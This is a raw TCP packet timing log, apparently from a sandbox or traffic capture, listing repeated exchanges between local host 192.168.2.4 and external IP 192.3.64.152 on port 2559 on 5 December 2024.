                                                                                                                                              Dec 5, 2024 18:26:48.264333010 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.264410019 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.394913912 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:48.448350906 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.488080978 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:48.496679068 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:48.499155045 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:48.516314030 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.617259026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.619254112 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.619307041 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.619410038 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.619443893 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.722776890 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:48.775839090 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.815376997 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:48.817137003 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:48.842739105 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.939105988 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.939192057 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.940278053 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.940506935 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.940712929 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.940840006 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.940982103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.940992117 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.941098928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.941205025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:48.941282034 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.035348892 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.104167938 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.141861916 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.143523932 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.156605005 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.263070107 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.263196945 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.263432980 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.265697002 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.266815901 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.266918898 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.267044067 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.393599987 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.415592909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.503772020 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.513351917 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.613327026 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.621937990 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.734997034 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.735023022 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.735104084 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.735158920 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.735205889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736634970 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736675978 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736772060 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736848116 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736857891 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736891985 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736938000 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.736963987 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.737016916 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.742253065 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.742443085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.742521048 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.742582083 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.742700100 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.742831945 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.772954941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:49.860312939 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.894890070 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.927670002 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:49.932967901 CET497422559192.168.2.4192.3.64.152
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 18:26:49.983237028 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.048595905 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.048727036 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.048769951 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.048860073 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.048891068 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.052901030 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.052958012 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.052993059 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.053072929 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.053138018 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.144803047 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.247303963 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.265441895 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.284096003 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.285875082 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.409959078 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.434324980 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.555881023 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.573642969 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.616843939 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.618485928 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.707180023 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.737474918 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.737517118 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.738796949 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.827131987 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.837225914 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.877662897 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.879556894 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.957187891 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:50.998034000 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.998071909 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.998151064 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.999593973 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.999614954 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.999696016 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:50.999849081 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.040482998 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.076970100 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.086249113 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.129446983 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.142956972 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.207812071 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.254261017 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.264786005 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.328583002 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.337874889 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.376794100 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.378393888 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.457463980 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.500751972 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.500785112 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.505157948 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.508204937 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.508348942 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.508368015 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.512104034 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.512187958 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.516144037 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.516230106 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.518887043 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.578227043 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.588568926 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.642848015 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.644629955 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.691622019 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.762989998 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.763044119 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.763061047 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.764514923 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.764579058 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.764617920 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.764683008 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.764715910 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.811382055 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.837701082 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:51.894397974 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.898351908 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.900820017 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:51.910345078 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.018716097 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.019005060 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.019138098 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.019155025 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.019196987 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.020843029 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.020961046 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.020979881 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.021039963 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.021156073 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.030431986 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.073287964 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.133760929 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.193631887 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.197144985 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.253477097 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.290019989 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.313534021 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.313668013 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.313735008 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.313963890 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.318321943 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.318332911 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.318829060 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.332590103 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.334376097 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.350888014 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.452795029 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.454515934 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.455084085 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.455666065 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.455826998 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.456425905 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.456434965 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.456444025 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.456454992 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.456464052 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.456588984 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.471528053 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.513617992 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.706840992 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.792588949 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:52.976587057 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.980185986 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:52.984663010 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.071770906 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.073436975 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.096589088 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096605062 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096626997 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096637011 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096689939 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096698999 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096766949 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096813917 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096899033 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096910000 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.096995115 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.097007036 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.097069025 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.097078085 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.100084066 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.100121021 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.100188017 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.100246906 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.100385904 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.100397110 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.104523897 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.176023960 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.192755938 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.194238901 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.195378065 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.196037054 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.196552038 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.196593046 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.197148085 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.197602987 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.198260069 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.198820114 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.199035883 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.300117970 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.363528013 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.363656044 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.409975052 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.426016092 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.427930117 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.486581087 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.546947956 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.554371119 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:53.572901964 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.572920084 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.572930098 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:53.572938919 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.746054888 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.748136997 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.748218060 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:53.798161983 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:53.799741030 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:53.868205070 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.888617992 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.919074059 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.919606924 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.919672012 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.919683933 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.919775009 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.919825077 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:53.924794912 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:53.950419903 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:53.952028990 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.044593096 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.071743011 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.071852922 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.071919918 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.072035074 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.080393076 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.128920078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.128978968 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.133728027 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.135795116 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.147617102 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.253597975 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.253659010 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.253815889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.253995895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.254072905 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.254154921 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.255645990 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.255731106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.255866051 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.255951881 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.256021976 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.267431021 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.276794910 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.278440952 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.300479889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.309626102 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.362131119 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.364351988 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.397795916 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.397813082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.397895098 CET255949742192.3.64.152192.168.2.4
